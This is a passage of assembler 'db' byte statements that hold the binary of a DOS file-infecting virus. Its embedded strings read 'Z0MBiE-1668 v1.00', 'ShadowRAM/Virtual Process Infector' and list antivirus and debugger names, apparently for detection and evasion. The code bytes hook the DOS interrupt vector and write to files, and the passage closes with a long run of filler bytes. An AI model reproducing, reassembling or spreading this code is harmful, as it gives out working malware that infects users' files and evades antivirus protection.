db 0c7h,045h,002h,002h,000h,00eh,007h,0a1h,08bh,008h,048h,0b9h,000h,002h,0f7h
|
|
db 0e1h,003h,006h,089h,008h,083h,0d2h,000h,08bh,0f0h,08bh,0fah,0b8h,002h,042h
|
|
db 099h,033h,0c9h,0e8h,041h,0ffh,03bh,0c6h,00fh,085h,0bah,000h,03bh,0d7h,00fh
|
|
db 085h,0b4h,000h,005h,00fh,000h,083h,0d2h,000h,024h,0f0h,02bh,0f0h,029h,036h
|
|
db 089h,008h,050h,052h,0c1h,0e8h,004h,0c1h,0e2h,00ch,00bh,0c2h,02bh,006h,08fh
|
|
db 008h,02dh,010h,000h,08bh,0c8h,087h,00eh,09dh,008h,089h,00eh,04bh,001h,0b9h
|
|
db 003h,001h,087h,00eh,09bh,008h,089h,00eh,051h,001h,08bh,0c8h,087h,00eh,095h
|
|
db 008h,089h,00eh,041h,001h,0b9h,010h,00ah,087h,00eh,097h,008h,089h,00eh,048h
|
|
db 001h,081h,006h,091h,008h,0a1h,000h,083h,006h,08bh,008h,01eh,083h,006h,089h
|
|
db 008h,03bh,0c6h,006h,099h,008h,069h,0b8h,000h,042h,059h,05ah,0e8h,0cfh,0feh
|
|
db 0e8h,05dh,000h,0b4h,040h,0bah,000h,001h,0b9h,02bh,000h,0e8h,0c1h,0feh,0beh
|
|
db 02bh,001h,0bfh,0c7h,008h,0b9h,008h,000h,0ach,092h,0bdh,008h,000h,033h,0c0h
|
|
db 0d0h,0e2h,0d1h,0d0h,048h,0aah,04dh,075h,0f5h,0e2h,0eeh,0b4h,040h,0bah,0c7h
|
|
db 008h,0b9h,040h,000h,0e8h,09bh,0feh,081h,0feh,0adh,008h,072h,0d7h,0b8h,000h
|
|
db 042h,099h,033h,0c9h,0e8h,08ch,0feh,0b4h,040h,0bah,087h,008h,0b9h,040h,000h
|
|
db 0e8h,081h,0feh,0b4h,03eh,0e8h,07ch,0feh,007h,01fh,061h,02eh,0c6h,006h,0abh
|
|
db 001h,090h,0e8h,0c9h,0fch,0c3h,0bfh,084h,007h,0b0h,0c3h,0aah,0b9h,0fdh,000h
|
|
db 033h,0c0h,0f3h,0aah,0c7h,006h,007h,001h,0f6h,0d0h,0b0h,008h,0e6h,070h,0e4h
|
|
db 071h,03ch,00ah,075h,028h,0c7h,006h,007h,001h,0b0h,000h,0b8h,009h,000h,0e8h
|
|
db 070h,0fch,096h,06bh,0f6h,012h,081h,0c6h,0e2h,006h,0b9h,002h,000h,0adh,097h
|
|
db 081h,0c7h,084h,007h,0a4h,0adh,097h,081h,0c7h,084h,007h,066h,0a5h,0e2h,0efh
|
|
db 0c3h,060h,01eh,006h,033h,0f6h,08eh,0deh,0c4h,09ch,084h,000h,00bh,0dbh,074h
|
|
db 01eh,0b8h,081h,0f0h,0cdh,021h,03dh,08ch,092h,074h,014h,02eh,089h,01eh,00ah
|
|
db 003h,02eh,08ch,006h,00ch,003h,0c7h,084h,084h,000h,0f5h,002h,08ch,08ch,086h
|
|
db 000h,007h,01fh,061h,0c3h,060h,0bah,034h,012h,032h,0f6h,0c1h,0e2h,004h,08dh
|
|
db 07fh,00ch,0b9h,00ah,000h,032h,0c0h,0fch,0f3h,0aeh,075h,033h,0bdh,053h,006h
|
|
db 0b9h,00bh,000h,08bh,0f5h,08bh,0fbh,02eh,0ach,03ch,0b0h,074h,004h,03ch,080h
|
|
db 073h,005h,026h,038h,005h,075h,011h,047h,0e2h,0eeh,08bh,0fbh,0b0h,0e5h,0aah
|
|
db 033h,0c0h,0b9h,01fh,000h,0f3h,0aah,0ebh,009h,083h,0c5h,00bh,081h,0fdh,0e2h
|
|
db 006h,075h,0d0h,083h,0c3h,020h,04ah,075h,0bah,061h,0c3h,050h,056h,057h,01eh
|
|
db 006h,02eh,0c5h,036h,02bh,003h,068h,034h,012h,007h,0bfh,082h,008h,08ah,004h
|
|
db 026h,086h,005h,088h,004h,046h,047h,081h,0ffh,087h,008h,075h,0f1h,007h,01fh
|
|
db 05fh,05eh,058h,0c3h,00dh,00ah,00ah,05ah,030h,04dh,042h,069h,045h,060h,031h
|
|
db 036h,036h,038h,020h,076h,031h,02eh,030h,030h,020h,028h,063h,029h,020h,031h
|
|
db 039h,039h,037h,020h,05ah,030h,04dh,042h,069h,045h,00dh,00ah,054h,06eh,078h
|
|
db 020h,074h,06fh,020h,053h,02eh,053h,02eh,052h,02eh,00dh,00ah,053h,068h,061h
|
|
db 064h,06fh,077h,052h,041h,04dh,02fh,056h,069h,072h,074h,075h,061h,06ch,020h
|
|
db 050h,072h,06fh,063h,065h,073h,073h,020h,049h,06eh,066h,065h,063h,074h,06fh
|
|
db 072h,00dh,00ah,053h,068h,061h,064h,06fh,077h,052h,041h,04dh,020h,054h,065h
|
|
db 063h,068h,06eh,06fh,06ch,06fh,067h,079h,020h,028h,063h,029h,020h,031h,039h
|
|
db 039h,036h,02ch,039h,037h,020h,05ah,030h,04dh,042h,069h,045h,00dh,00ah,041h
|
|
db 044h,049h,04eh,046h,0f9h,0a3h,0a0h,0a2h,0adh,0aeh,041h,049h,044h,053h,0f9h
|
|
db 0afh,0aeh,0a3h,0a0h,0adh,0ech,041h,056h,050h,0f9h,0f9h,0e1h,0a0h,0aah,0e1h
|
|
db 0f9h,0f9h,057h,045h,042h,0f9h,0f9h,0e3h,0a9h,0aeh,0a1h,0aeh,0aah,044h,052h
|
|
db 057h,045h,042h,0f9h,0e2h,0aeh,0a6h,0a5h,0f9h,0f9h,0e5h,0e3h,0a9h,0adh,0efh
|
|
db 0f9h,0f9h,0b0h,0b0h,0b0h,0f9h,0a4h,0a5h,0e0h,0ech,0ach,0aeh,0f9h,043h,050h
|
|
db 050h,0adh,0a5h,0adh,0a0h,0a2h,0a8h,0a6h,0e3h,043h,020h,020h,053h,02dh,049h
|
|
db 043h,045h,0f9h,0e0h,0e3h,0abh,0a5h,0a7h,054h,044h,0f9h,0ach,0a0h,0e1h,0e2h
|
|
db 0f9h,0a4h,0a0h,0a9h,044h,045h,042h,055h,047h,0f9h,0f9h,0a3h,0e3h,0a4h,0f9h
|
|
db 057h,045h,042h,037h,030h,038h,030h,031h,0edh,0e2h,0aeh,043h,041h,0f9h,0ach
|
|
db 0aeh,0f1h,0f9h,0f9h,041h,056h,0f9h,015h,000h,01eh,051h,000h,0f1h,060h,01eh
|
|
db 009h,0bdh,000h,0a3h,0f7h,000h,0fah,005h,074h,00bh,006h,000h,0b4h,022h,000h
|
|
db 01eh,0f7h,0ebh,0f1h,0b3h,000h,080h,0dfh,000h,024h,016h,002h,03dh,032h,000h
|
|
db 01eh,05eh,000h,095h,025h,0b8h,001h,0c5h,000h,033h,0e1h,000h,0e9h,0c9h,004h
|
|
db 0b1h,03eh,000h,0fah,05ah,000h,00bh,04ch,013h,08bh,0cdh,000h,080h,0f9h,000h
|
|
db 07fh,0dfh,0e0h,059h,009h,000h,02eh,025h,000h,025h,0e5h,009h,0e8h,037h,000h
|
|
db 0e8h,063h,000h,0a4h,0f8h,002h,04bh,009h,000h,050h,025h,000h,025h,052h,084h
|
|
db 000h,043h,000h,080h,06fh,000h,04eh,09ah,044h,003h,01ah,000h,050h,046h,000h
|
|
db 0adh,0cbh,033h,0c0h,085h,000h,0a1h,0a1h,000h,01bh,0fdh,006h,0a3h,036h,000h
|
|
db 0b8h,052h,000h,05bh,0c6h,0e0h,050h,0b2h,000h,09ch,0deh,000h,04eh,0e3h,0c9h
|
|
db 08eh,007h,000h,08eh,023h,000h,083h,008h,0a2h,002h,0b3h,000h,091h,0dfh,000h
|
|
db 059h,0feh,015h,003h,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh,03fh
|
|
db 03fh,03fh,03fh
|
|
|
|
|
|
|
|
|
|
|